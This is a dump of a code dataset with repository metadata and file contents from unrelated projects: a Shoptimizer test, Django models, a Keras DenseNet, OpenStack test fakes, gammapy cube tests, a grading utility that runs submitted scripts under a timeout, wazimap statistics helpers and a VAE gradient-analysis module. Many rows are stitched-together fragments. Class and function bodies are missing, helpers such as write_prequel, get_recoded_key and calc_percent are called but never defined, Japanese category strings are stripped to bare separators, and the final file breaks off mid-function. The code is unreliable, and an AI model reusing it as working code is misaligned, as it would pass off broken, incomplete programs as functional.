hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 11
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
251
| max_stars_repo_name
stringlengths 4
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
251
| max_issues_repo_name
stringlengths 4
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
251
| max_forks_repo_name
stringlengths 4
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.05M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.04M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
903e7c7c7eb9a7d02da0c1871291e12b6246e93e | 20,260 | py | Python | shoptimizer_api/optimizers_builtin/title_word_order_optimizer_test.py | astivi/shoptimizer | e9e415650b2b8fc07e4ae68c741e692b538e4a2c | [
"Apache-2.0"
] | null | null | null | shoptimizer_api/optimizers_builtin/title_word_order_optimizer_test.py | astivi/shoptimizer | e9e415650b2b8fc07e4ae68c741e692b538e4a2c | [
"Apache-2.0"
] | null | null | null | shoptimizer_api/optimizers_builtin/title_word_order_optimizer_test.py | astivi/shoptimizer | e9e415650b2b8fc07e4ae68c741e692b538e4a2c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for title_word_order_optimizer."""
from absl.testing import parameterized
import unittest.mock as mock
from optimizers_builtin import title_word_order_optimizer
from test_data import requests_bodies
from util import app_util
import constants
# GPC ID IS 201
_PROPER_GPC_CATEGORY_EN = 'Apparel & Accessories > Jewelry > Watches'
# GPC ID is 201
_PROPER_GPC_CATEGORY_JA = (' > '
' > ')
# GPC ID is 5598
_GPC_CATEGORY_LEVEL_4_JA = (' > '
' > > '
'')
_MAX_WMM_MOVE_THRESHOLD_EN = 25
_MAX_WMM_MOVE_THRESHOLD_JA = 12
| 40.846774 | 123 | 0.696249 |
903ed7280655c7a88f5f5eb4e9a427e26a17d12e | 4,035 | py | Python | contracts/models.py | sivanagarajumolabanti/IPFS | 9ae01ce09c97660ca312aad7d612bbc8eb8146e7 | [
"MIT"
] | 1 | 2019-08-27T04:20:06.000Z | 2019-08-27T04:20:06.000Z | contracts/models.py | sivanagarajumolabanti/IPFS | 9ae01ce09c97660ca312aad7d612bbc8eb8146e7 | [
"MIT"
] | null | null | null | contracts/models.py | sivanagarajumolabanti/IPFS | 9ae01ce09c97660ca312aad7d612bbc8eb8146e7 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import User
from django.db import models
from django.utils.timezone import now
| 36.351351 | 102 | 0.691698 |
903f6e6ec0a321ed686c231ab9ebc657c40c7407 | 1,500 | py | Python | models/DenseNet.py | Apollo1840/DeepECG | 5132b5fc8f6b40c4b2f175cd5e56c4aec128ab3e | [
"MIT"
] | 2 | 2020-11-16T10:50:56.000Z | 2020-11-23T12:31:30.000Z | models/DenseNet.py | Apollo1840/DeepECG | 5132b5fc8f6b40c4b2f175cd5e56c4aec128ab3e | [
"MIT"
] | null | null | null | models/DenseNet.py | Apollo1840/DeepECG | 5132b5fc8f6b40c4b2f175cd5e56c4aec128ab3e | [
"MIT"
] | 1 | 2020-08-05T00:23:54.000Z | 2020-08-05T00:23:54.000Z | from keras.models import Sequential
from keras.layers import Dense, Dropout
| 41.666667 | 100 | 0.719333 |
9040b2be08c9dcba639583373b5f0c4c01de3091 | 13,242 | py | Python | openstackclient/tests/unit/volume/v3/fakes.py | mydevice/python-openstackclient | 4891bb38208fdcd1a2ae60e47b056841e14fbdf7 | [
"Apache-2.0"
] | 262 | 2015-01-29T20:10:49.000Z | 2022-03-23T01:59:23.000Z | openstackclient/tests/unit/volume/v3/fakes.py | mydevice/python-openstackclient | 4891bb38208fdcd1a2ae60e47b056841e14fbdf7 | [
"Apache-2.0"
] | 5 | 2015-01-21T02:37:35.000Z | 2021-11-23T02:26:00.000Z | openstackclient/tests/unit/volume/v3/fakes.py | mydevice/python-openstackclient | 4891bb38208fdcd1a2ae60e47b056841e14fbdf7 | [
"Apache-2.0"
] | 194 | 2015-01-08T07:39:27.000Z | 2022-03-30T13:51:23.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from unittest import mock
import uuid
from cinderclient import api_versions
from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes
from openstackclient.tests.unit import utils
from openstackclient.tests.unit.volume.v2 import fakes as volume_v2_fakes
# TODO(stephenfin): Check if the responses are actually the same
FakeVolume = volume_v2_fakes.FakeVolume
FakeVolumeType = volume_v2_fakes.FakeVolumeType
| 33.953846 | 79 | 0.614258 |
9040cb412be761146b6669d9fd4eade5a3ac0512 | 12,287 | py | Python | gammapy/cube/tests/test_core.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | 3 | 2019-01-28T12:21:14.000Z | 2019-02-10T19:58:07.000Z | gammapy/cube/tests/test_core.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | null | null | null | gammapy/cube/tests/test_core.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from numpy.testing import assert_allclose
from astropy.coordinates import Angle
from astropy.tests.helper import pytest, assert_quantity_allclose
from astropy.units import Quantity
from astropy.wcs import WCS
from ...utils.testing import requires_dependency, requires_data
from ...datasets import FermiGalacticCenter
from ...image import make_header
from ...irf import EnergyDependentTablePSF
from ...spectrum.powerlaw import power_law_evaluate
from .. import SkyCube, compute_npred_cube, convolve_cube
def make_test_cubes(energies, nxpix, nypix, binsz):
"""Makes exposure and spectral cube for tests.
Parameters
----------
energies : `~astropy.units.Quantity`
Quantity 1D array of energies of cube layers
nxpix : int
Number of pixels in x-spatial direction
nypix : int
Number of pixels in y-spatial direction
binsz : float
Spatial resolution of cube, in degrees per pixel
Returns
-------
exposure_cube : `~gammapy.sky_cube.SkyCube`
Cube of uniform exposure = 1 cm^2 s
sky_cube : `~gammapy.sky_cube.SkyCube`
Cube of differential fluxes in units of cm^-2 s^-1 GeV^-1 sr^-1
"""
header = make_header(nxpix, nypix, binsz)
header['NAXIS'] = 3
header['NAXIS3'] = len(energies)
header['CDELT3'] = 1
header['CRVAL3'] = 1
header['CRPIX3'] = 1
wcs = WCS(header)
data_array = np.ones((len(energies), 10, 10))
exposure_cube = SkyCube(data=Quantity(data_array, 'cm2 s'),
wcs=wcs, energy=energies)
flux = power_law_evaluate(energies.value, 1, 2, 1)
flux = Quantity(flux, '1/(cm2 s GeV sr)')
flux_array = np.zeros_like(data_array)
for i in np.arange(len(flux)):
flux_array[i] = flux.value[i] * data_array[i]
sky_cube = SkyCube(data=Quantity(flux_array, flux.unit),
wcs=wcs, energy=energies)
return exposure_cube, sky_cube
| 39.763754 | 90 | 0.657524 |
90429ee16f26834b4fd4e1ca6831ceabda97033d | 298 | py | Python | api/applications/migrations/0042_merge_20201213_0228.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 3 | 2019-05-15T09:30:39.000Z | 2020-04-22T16:14:23.000Z | api/applications/migrations/0042_merge_20201213_0228.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 85 | 2019-04-24T10:39:35.000Z | 2022-03-21T14:52:12.000Z | api/applications/migrations/0042_merge_20201213_0228.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 1 | 2021-01-17T11:12:19.000Z | 2021-01-17T11:12:19.000Z | # Generated by Django 2.2.16 on 2020-12-13 02:28
from django.db import migrations
| 21.285714 | 64 | 0.694631 |
90459d8bfe26d007178d66a09649931906768496 | 5,829 | py | Python | web_app/ca_modules/make_utils.py | Lockers13/codagio | cfe9325cb3c207f7728db3c287439ce761ffea14 | [
"MIT"
] | 2 | 2021-01-16T13:42:14.000Z | 2021-03-03T19:36:47.000Z | web_app/ca_modules/make_utils.py | Lockers13/codagio | cfe9325cb3c207f7728db3c287439ce761ffea14 | [
"MIT"
] | null | null | null | web_app/ca_modules/make_utils.py | Lockers13/codagio | cfe9325cb3c207f7728db3c287439ce761ffea14 | [
"MIT"
] | null | null | null | ### A module containing various utilities used at various points throughout the processes of submitting and analyzing problems ###
import os
import json
import subprocess
import hashlib
import sys
import random
import string
from .output_processor import process_output
from . import code_templates
def make_file(path, code, problem_data):
"""Function to create script that is used for verification and profiling purposes
Returns nothing, writes to disk"""
ctemps = code_templates.get_ctemp_dict()
program_text = code
input_type = list(problem_data["metadata"]["input_type"].keys())[0]
main_function = problem_data["metadata"]["main_function"]
init_data = problem_data["init_data"]
is_init_data = problem_data["metadata"]["init_data"]
is_inputs = problem_data["metadata"]["inputs"]
with open(path, 'w') as f:
write_prequel(f)
for line in program_text:
split_line = line.split()
if len(split_line) > 0 and line.split()[0] == "def":
func_name = line.split()[1].split("(")[0]
if func_name == main_function:
fname = func_name
f.write("{0}\n".format(line))
if not line.endswith("\n"):
f.write("\n")
write_sequel(f, fname)
def gen_sample_outputs(filename, problem_data, init_data=None, input_type="default"):
"""Utility function invoked whenever a reference problem is submitted
Returns a list of outputs that are subsequently stored in DB as field associated with given problem"""
inputs = problem_data["inputs"]
platform = sys.platform.lower()
SAMPUP_TIMEOUT = "8"
SAMPUP_MEMOUT = "1000"
timeout_cmd = "gtimeout {0}".format(SAMPUP_TIMEOUT) if platform == "darwin" else "timeout {0} -m {1}".format(SAMPUP_TIMEOUT, SAMPUP_MEMOUT) if platform == "linux" or platform == "linux2" else ""
base_cmd = "{0} python".format(timeout_cmd)
outputs = []
if input_type == "default":
programmatic_inputs = inputs
if inputs is not None:
for inp in programmatic_inputs:
input_arg = json.dumps(inp)
output = process_output(base_cmd, filename, input_arg=input_arg, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
else:
output = process_output(base_cmd, filename, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
elif input_type == "file":
for script in inputs:
output = process_output(base_cmd, filename, input_arg=script, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
try:
os.remove(script)
except:
pass
return outputs
def generate_input(input_type, input_length, num_tests):
"""Self-explanatory utility function that generates test input for a submitted reference problem based on metadata specifications
Returns jsonified list of inputs"""
global_inputs = []
for i in range(num_tests):
if input_type == "integer":
inp_list = [random.randint(1, 1000) for x in range(input_length)]
elif input_type == "float":
inp_list = [round(random.uniform(0.0, 1000.0), 2) for x in range(input_length)]
elif input_type == "string":
inp_list = [random_string(random.randint(1, 10)) for x in range(input_length)]
global_inputs.append(inp_list)
return global_inputs | 40.2 | 198 | 0.632699 |
904821f621f97dceeec43eb063d81e21fa90c37c | 21,136 | py | Python | wazimap/data/utils.py | AssembleOnline/wazimap | 1b8b68fb231b768047eee1b20ed180e4820a2890 | [
"MIT"
] | 1 | 2019-01-14T15:37:03.000Z | 2019-01-14T15:37:03.000Z | wazimap/data/utils.py | Bhanditz/wazimap | fde22a0874020cf0ae013aeec7ab55b7c5a70b27 | [
"MIT"
] | null | null | null | wazimap/data/utils.py | Bhanditz/wazimap | fde22a0874020cf0ae013aeec7ab55b7c5a70b27 | [
"MIT"
] | null | null | null | from __future__ import division
from collections import OrderedDict
from sqlalchemy import create_engine, MetaData, func
from sqlalchemy.orm import sessionmaker, class_mapper
from django.conf import settings
from django.db.backends.base.creation import TEST_DATABASE_PREFIX
from django.db import connection
if settings.TESTING:
# Hack to ensure the sqlalchemy database name matches the Django one
# during testing
url = settings.DATABASE_URL
parts = url.split("/")
# use the test database name
db_name = connection.settings_dict.get('TEST', {}).get('NAME')
if db_name is None:
db_name = TEST_DATABASE_PREFIX + parts[-1]
parts[-1] = db_name
url = '/'.join(parts)
_engine = create_engine(url)
else:
_engine = create_engine(settings.DATABASE_URL)
# See http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions
naming_convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
_metadata = MetaData(bind=_engine, naming_convention=naming_convention)
_Session = sessionmaker(bind=_engine)
def capitalize(s):
"""
Capitalize the first char of a string, without
affecting the rest of the string.
This differs from `str.capitalize` since the latter
also lowercases the rest of the string.
"""
if not s:
return s
return ''.join([s[0].upper(), s[1:]])
def percent(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom * 100, places)
def ratio(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom, places)
def add_metadata(data, table):
if 'metadata' not in data:
data['metadata'] = {}
# this might be a SQLAlchemy model that is linked back to
# a data table
if hasattr(table, 'data_tables'):
table = table.data_tables[0]
data['metadata']['table_id'] = table.id
if table.universe:
data['metadata']['universe'] = table.universe
if table.year:
data['metadata']['year'] = table.year
# dictionaries that merge_dicts will merge
MERGE_KEYS = set(['values', 'numerators', 'error'])
def calculate_median(objects, field_name):
'''
Calculates the median where obj.total is the distribution count and
getattr(obj, field_name) is the distribution segment.
Note: this function assumes the objects are sorted.
'''
total = 0
for obj in objects:
total += obj.total
half = total / 2.0
counter = 0
for i, obj in enumerate(objects):
counter += obj.total
if counter > half:
if counter - half == 1:
# total must be even (otherwise counter - half ends with .5)
return (float(getattr(objects[i - 1], field_name)) +
float(getattr(obj, field_name))) / 2.0
return float(getattr(obj, field_name))
elif counter == half:
# total must be even (otherwise half ends with .5)
return (float(getattr(obj, field_name)) +
float(getattr(objects[i + 1], field_name))) / 2.0
def calculate_median_stat(stats):
'''
Calculates the stat (key) that lies at the median for stat data from the
output of get_stat_data.
Note: this function assumes the objects are sorted.
'''
total = 0
keys = [k for k in stats.iterkeys() if k != 'metadata']
total = sum(stats[k]['numerators']['this'] for k in keys)
half = total / 2.0
counter = 0
for key in keys:
counter += stats[key]['numerators']['this']
if counter >= half:
return key
def merge_dicts(this, other, other_key):
'''
Recursively merges 'other' dict into 'this' dict. In particular
it merges the leaf nodes specified in MERGE_KEYS.
'''
for key, values in this.iteritems():
if key in MERGE_KEYS:
if key in other:
values[other_key] = other[key]['this']
elif isinstance(values, dict):
merge_dicts(values, other[key], other_key)
def group_remainder(data, num_items=4, make_percentage=True,
remainder_name="Other"):
'''
This function assumes data is an OrderedDict instance. It iterates
over the dict items, grouping items with index >= num_items - 1 together
under key remainder_name. If make_percentage = True, the 'values' dict
contains percentages and the 'numerators' dict the totals. Otherwise
'values' contains the totals.
'''
num_key = 'numerators' if make_percentage else 'values'
total_all = dict((k, 0.0) for k in data.values()[0][num_key].keys())
total_other = total_all.copy()
other_dict = {
"name": remainder_name,
"error": {"this": 0.0},
"numerator_errors": {"this": 0.0},
num_key: total_other,
}
cutoff = num_items - 2
for i, (key, values) in enumerate(data.items()):
if key == 'metadata':
continue
for k, v in values[num_key].iteritems():
total_all[k] += v
if i > cutoff:
del data[key]
data.setdefault(remainder_name, other_dict)
for k, v in values[num_key].iteritems():
total_other[k] += v
if make_percentage:
for key, values in data.iteritems():
if key != 'metadata':
values['values'] = dict((k, percent(v, total_all[k]))
for k, v in values['numerators'].iteritems())
def get_objects_by_geo(db_model, geo, session, fields=None, order_by=None,
only=None, exclude=None, data_table=None):
""" Get rows of statistics from the stats mode +db_model+ for a particular
geography, summing over the 'total' field and grouping by +fields+. Filters
to include +only+ and ignore +exclude+, if given.
"""
data_table = data_table or db_model.data_tables[0]
if fields is None:
fields = [c.key for c in class_mapper(db_model).attrs if c.key not in ['geo_code', 'geo_level', 'geo_version', 'total']]
fields = [getattr(db_model, f) for f in fields]
objects = session\
.query(func.sum(db_model.total).label('total'), *fields)\
.group_by(*fields)\
.filter(db_model.geo_code == geo.geo_code)\
.filter(db_model.geo_level == geo.geo_level)\
.filter(db_model.geo_version == geo.version)
if only:
for k, v in only.iteritems():
objects = objects.filter(getattr(db_model, k).in_(v))
if exclude:
for k, v in exclude.iteritems():
objects = objects.filter(getattr(db_model, k).notin_(v))
if order_by is not None:
attr = order_by
is_desc = False
if order_by[0] == '-':
is_desc = True
attr = attr[1:]
if attr == 'total':
if is_desc:
attr = attr + ' DESC'
else:
attr = getattr(db_model, attr)
if is_desc:
attr = attr.desc()
objects = objects.order_by(attr)
objects = objects.all()
if len(objects) == 0:
raise LocationNotFound("%s for geography %s version '%s' not found"
% (db_model.__table__.name, geo.geoid, geo.version))
return objects
def get_stat_data(fields, geo, session, order_by=None,
percent=True, total=None, table_fields=None,
table_name=None, only=None, exclude=None, exclude_zero=False,
recode=None, key_order=None, table_dataset=None,
percent_grouping=None, slices=None):
"""
This is our primary helper routine for building a dictionary suitable for
a place's profile page, based on a statistic.
It sums over the data for ``fields`` in the database for the place identified by
``geo`` and calculates numerators and values. If multiple fields are given,
it creates nested result dictionaries.
Control the rows that are included or ignored using ``only``, ``exclude`` and ``exclude_zero``.
The field values can be recoded using ``recode`` and and re-ordered using ``key_order``.
:param fields: the census field to build stats for. Specify a list of fields to build
nested statistics. If multiple fields are specified, then the values
of parameters such as ``only``, ``exclude`` and ``recode`` will change.
These must be fields in `api.models.census.census_fields`, e.g. 'highest educational level'
:type fields: str or list
:param geo: the geograhy object
:param dbsession session: sqlalchemy session
:param str order_by: field to order by, or None for default, eg. '-total'
:param bool percent: should we calculate percentages, or just sum raw values?
:param list percent_grouping: when calculating percentages, which fields should rows be grouped by?
Default: none of them -- calculate each entry as a percentage of the
whole dataset. Ignored unless ``percent`` is ``True``.
:param list table_fields: list of fields to use to find the table, defaults to `fields`
:param int total: the total value to use for percentages, or None to total columns automatically
:param str table_name: override the table name, otherwise it's calculated from the fields and geo_level
:param list only: only include these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings.
:type only: dict or list
:param exclude: ignore these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings. Field names are checked
before any recoding.
:type exclude: dict or list
:param bool exclude_zero: ignore fields that have a zero or null total
:param recode: function or dict to recode values of ``key_field``. If ``fields`` is a singleton,
then the keys of this dict must be the values to recode from, otherwise
they must be the field names and then the values. If this is a lambda,
it is called with the field name and its value as arguments.
:type recode: dict or lambda
:param key_order: ordering for keys in result dictionary. If ``fields`` has many items,
this must be a dict from field names to orderings.
The default ordering is determined by ``order``.
:type key_order: dict or list
:param str table_dataset: dataset used to help find the table if ``table_name`` isn't given.
:param list slices: return only a slice of the final data, by choosing a single value for each
field in the field list, as specified in the slice list.
:return: (data-dictionary, total)
"""
from .tables import FieldTable
if not isinstance(fields, list):
fields = [fields]
n_fields = len(fields)
many_fields = n_fields > 1
if order_by is None:
order_by = fields[0]
if only is not None:
if not isinstance(only, dict):
if many_fields:
raise ValueError("If many fields are given, then only must be a dict. I got %s instead" % only)
else:
only = {fields[0]: set(only)}
if exclude is not None:
if not isinstance(exclude, dict):
if many_fields:
raise ValueError("If many fields are given, then exclude must be a dict. I got %s instead" % exclude)
else:
exclude = {fields[0]: set(exclude)}
if key_order:
if not isinstance(key_order, dict):
if many_fields:
raise ValueError("If many fields are given, then key_order must be a dict. I got %s instead" % key_order)
else:
key_order = {fields[0]: key_order}
else:
key_order = {}
if recode:
if not isinstance(recode, dict) or not many_fields:
recode = dict((f, recode) for f in fields)
table_fields = table_fields or fields
# get the table and the model
if table_name:
data_table = FieldTable.get(table_name)
else:
data_table = FieldTable.for_fields(table_fields, table_dataset)
if not data_table:
ValueError("Couldn't find a table that covers these fields: %s" % table_fields)
objects = get_objects_by_geo(data_table.model, geo, session, fields=fields, order_by=order_by,
only=only, exclude=exclude, data_table=data_table)
if total is not None and many_fields:
raise ValueError("Cannot specify a total if many fields are given")
if total and percent_grouping:
raise ValueError("Cannot specify a total if percent_grouping is given")
if total is None and percent and data_table.total_column is None:
# The table doesn't support calculating percentages, but the caller
# has asked for a percentage without providing a total value to use.
# Either specify a total, or specify percent=False
raise ValueError("Asking for a percent on table %s that doesn't support totals and no total parameter specified." % data_table.id)
# sanity check the percent grouping
if percent:
if percent_grouping:
for field in percent_grouping:
if field not in fields:
raise ValueError("Field '%s' specified in percent_grouping must be in the fields list." % field)
# re-order percent grouping to be same order as in the field list
percent_grouping = [f for f in fields if f in percent_grouping]
else:
percent_grouping = None
denominator_key = getattr(data_table, 'denominator_key')
root_data = OrderedDict()
running_total = 0
group_totals = {}
grand_total = -1
def get_data_object(obj):
""" Recurse down the list of fields and return the
final resting place for data for this stat. """
data = root_data
for i, field in enumerate(fields):
key = getattr(obj, field)
if recode and field in recode:
key = get_recoded_key(recode, field, key)
else:
key = capitalize(key)
# enforce key ordering the first time we see this field
if (not data or data.keys() == ['metadata']) and field in key_order:
for fld in key_order[field]:
data[fld] = OrderedDict()
# ensure it's there
if key not in data:
data[key] = OrderedDict()
data = data[key]
# default values for intermediate fields
if data is not None and i < n_fields - 1:
data['metadata'] = {'name': key}
# data is now the dict where the end value is going to go
if not data:
data['name'] = key
data['numerators'] = {'this': 0.0}
return data
# run the stats for the objects
for obj in objects:
if not obj.total and exclude_zero:
continue
if denominator_key and getattr(obj, data_table.fields[-1]) == denominator_key:
grand_total = obj.total
# don't include the denominator key in the output
continue
# get the data dict where these values must go
data = get_data_object(obj)
if not data:
continue
if obj.total is not None:
data['numerators']['this'] += obj.total
running_total += obj.total
else:
# TODO: sanity check this is the right thing to do for multiple fields with
# nested nulls -- does aggregating over nulls treat them as zero, or should we
# treat them as null?
data['numerators']['this'] = None
if percent_grouping:
if obj.total is not None:
group_key = tuple()
for field in percent_grouping:
key = getattr(obj, field)
if recode and field in recode:
# Group by recoded keys
key = get_recoded_key(recode, field, key)
group_key = group_key + (key,)
data['_group_key'] = group_key
group_totals[group_key] = group_totals.get(group_key, 0) + obj.total
if grand_total == -1:
grand_total = running_total if total is None else total
# add in percentages
calc_percent(root_data)
if slices:
for v in slices:
root_data = root_data[v]
add_metadata(root_data, data_table)
return root_data, grand_total
| 36.758261 | 138 | 0.607116 |
9048acfcee11de068839ac11bcc199658e3bb1fe | 9,913 | py | Python | ovis/analysis/gradients.py | vlievin/ovis | 71f05a5f5219b2df66a9cdbd5a5339e0e179597b | [
"MIT"
] | 10 | 2020-08-06T22:25:11.000Z | 2022-03-07T13:10:15.000Z | ovis/analysis/gradients.py | vlievin/ovis | 71f05a5f5219b2df66a9cdbd5a5339e0e179597b | [
"MIT"
] | 2 | 2021-06-08T22:15:24.000Z | 2022-03-12T00:45:59.000Z | ovis/analysis/gradients.py | vlievin/ovis | 71f05a5f5219b2df66a9cdbd5a5339e0e179597b | [
"MIT"
] | null | null | null | from time import time
from typing import *
import torch
from booster import Diagnostic
from torch import Tensor
from tqdm import tqdm
from .utils import cosine, percentile, RunningMean, RunningVariance
from ..estimators import GradientEstimator
from ..models import TemplateModel
def get_grads_from_tensor(model: TemplateModel, loss: Tensor, output: Dict[str, Tensor], tensor_id: str, mc: int, iw: int):
"""
Compute the gradients given a `tensor` on which was called `tensor.retain_graph()`
Assumes `tensor` to have `tensor.shape[0] == bs * iw * mc`
:param model: VAE model
:param loss: loss value
:param output: model's output: dict
:param tensor_id: key of the tensor in the model output
:param mc: number of outer Monte-Carlo samples
:param iw: number of inner Importance-Weighted samples
:return: gradient: Tensor of shape [D,] where D is the number of elements in `tensor`
"""
assert tensor_id in output.keys(), f"Tensor_id = `{tensor_id}` not in model's output"
model.zero_grad()
loss.sum().backward(create_graph=True, retain_graph=True)
# get the tensor of interest
tensors = output[tensor_id] if isinstance(output[tensor_id], list) else output[tensor_id]
bs = tensors[0].shape[0] // (mc * iw)
# get the gradients, flatten and concat across the feature dimension
gradients = [p.grad for p in tensors]
assert not any(
[g is None for g in gradients]), f"{sum([int(g is None) for g in gradients])} tensors have no gradients. " \
f"Use `tensor.retain_graph()` in your model to enable gradients. " \
f"tensor_id = `{tensor_id}`"
# compute gradients estimate for each individual grads
# sum individual gradients because x_expanded = x.expand(bs, mc, iw)
gradients = torch.cat([g.view(bs, mc * iw, -1).sum(1) for g in gradients], 1)
# return an MC average of the grads
return gradients.mean(0)
def get_grads_from_parameters(model: TemplateModel, loss: Tensor, key_filter: str = ''):
"""
Return the gradients for the parameters matching the `key_filter`
:param model: VAE model
:param loss: loss value
:param key_filter: filter value (comma separated values accepted (e.g. "A,b"))
:return: Tensor of shape [D,] where `D` is the number of parameters
"""
key_filters = key_filter.split(',')
params = [p for k, p in model.named_parameters() if any([(_key in k) for _key in key_filters])]
assert len(params) > 0, f"No parameters matching filter = `{key_filters}`"
model.zero_grad()
# backward individual gradients \nabla L[i]
loss.mean().backward(create_graph=True, retain_graph=True)
# gather gradients for each parameter and concat such that each element across the dim 1 is a parameter
grads = [p.grad.view(-1) for p in params if p.grad is not None]
return torch.cat(grads, 0)
def get_gradients_statistics(estimator: GradientEstimator,
model: TemplateModel,
x: Tensor,
mc_samples: int = 100,
key_filter: str = 'inference_network',
oracle_grad: Optional[Tensor] = None,
return_grads: bool = False,
compute_dsnr: bool = True,
samples_per_batch: Optional[int] = None,
eps: float = 1e-15,
tqdm: Callable = tqdm,
**config: Dict) -> Tuple[Diagnostic, Dict]:
"""
Compute the gradients and return the statistics (Variance, Magnitude, SNR, DSNR)
If an `oracle` gradient is available: compute the cosine similarity with the oracle and the gradient estimate (direction)
The Magnitude, Variance and SNR are defined parameter-wise. All return values are average over the D parameters with
Variance > eps. For instance, the returned SNR is
* SNR = 1/D \sum_d SNR_d
Each MC sample is computed sequentially and the mini-batch `x` will be split into chuncks
if a value `samples_per_batch` if specified and if `samples_per_batch < x.size(0) * mc * iw`.
:param estimator: Gradient Estimator
:param model: VAE model
:param x: mini-batch of observations
:param mc_samples: number of Monte-Carlo samples
:param key_filter: key matching parameters names in the model
:param oracle_grad: true direction of the gradients [Optional]
:param return_grads: return all gradients in the `meta` output directory if set to `True`
:param compute_dsnr: compute the Directional SNR if set to `True`
:param samples_per_batch: max. number of individual samples `bs * mc * iw` per mini-batch [Optional]
:param eps: minimum Variance value used for filtering
:param config: config dictionary for the estimator
:param tqdm: custom `tqdm` function
:return: output : Diagnostic = {'grads' : {'variance': ..,
'magnitude': ..,
'snr': ..,
'dsnr' ..,
'direction': cosine similarity with the oracle,
'keep_ratio' : ratio of parameter-wise gradients > epsilon}}
'snr': {'percentiles', 'mean', 'min', 'max'}
},
meta : additional data including the gradients values if `return_grads`
"""
_start = time()
grads_dsnr = None
grads_mean = RunningMean()
grads_variance = RunningVariance()
if oracle_grad is not None:
grads_dir = RunningMean()
all_grads = None
# compute each MC sample sequentially
for i in tqdm(range(mc_samples), desc="Gradients Analysis"):
# compute number of chuncks based on the capacity `samples_per_batch`
if samples_per_batch is None:
chuncks = 1
else:
bs = x.size(0)
mc = estimator.config['mc']
iw = estimator.config['iw']
# infer number of chunks
total_samples = bs * mc * iw
chuncks = max(1, -(-total_samples // samples_per_batch)) # ceiling division
# compute mini-batch gradient by chunck if `x` is large
gradients = RunningMean()
for k, x_ in enumerate(x.chunk(chuncks, dim=0)):
model.eval()
model.zero_grad()
# forward, backward to compute the gradients
loss, diagnostics, output = estimator(model, x_, backward=False, **config)
# gather mini-batch gradients
if 'tensor:' in key_filter:
tensor_id = key_filter.replace("tensor:", "")
gradients_ = get_grads_from_tensor(model, loss, output, tensor_id, estimator.mc, estimator.iw)
else:
gradients_ = get_grads_from_parameters(model, loss, key_filter=key_filter)
# move to cpu
gradients_ = gradients_.detach().cpu()
# update average
gradients.update(gradients_, k=x_.size(0))
# gather statistics
with torch.no_grad():
gradients = gradients()
if return_grads or compute_dsnr:
all_grads = gradients[None] if all_grads is None else torch.cat([all_grads, gradients[None]], 0)
grads_mean.update(gradients)
grads_variance.update(gradients)
# compute the statistics
with torch.no_grad():
# compute statistics for each data point `x_i`
grads_variance = grads_variance()
grads_mean = grads_mean()
# compute signal-to-noise ratio. see `tighter variational bounds are not necessarily better` (eq. 4)
